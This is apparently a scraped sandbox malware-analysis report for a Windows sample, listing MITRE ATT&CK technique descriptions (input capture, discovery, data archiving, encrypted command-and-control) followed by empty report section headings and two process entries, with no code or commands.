Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Y0K4O5JTDz

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 4244 Parent PID: 5576

General

Analysis Process: cmd.exe PID: 1124 Parent PID: 4244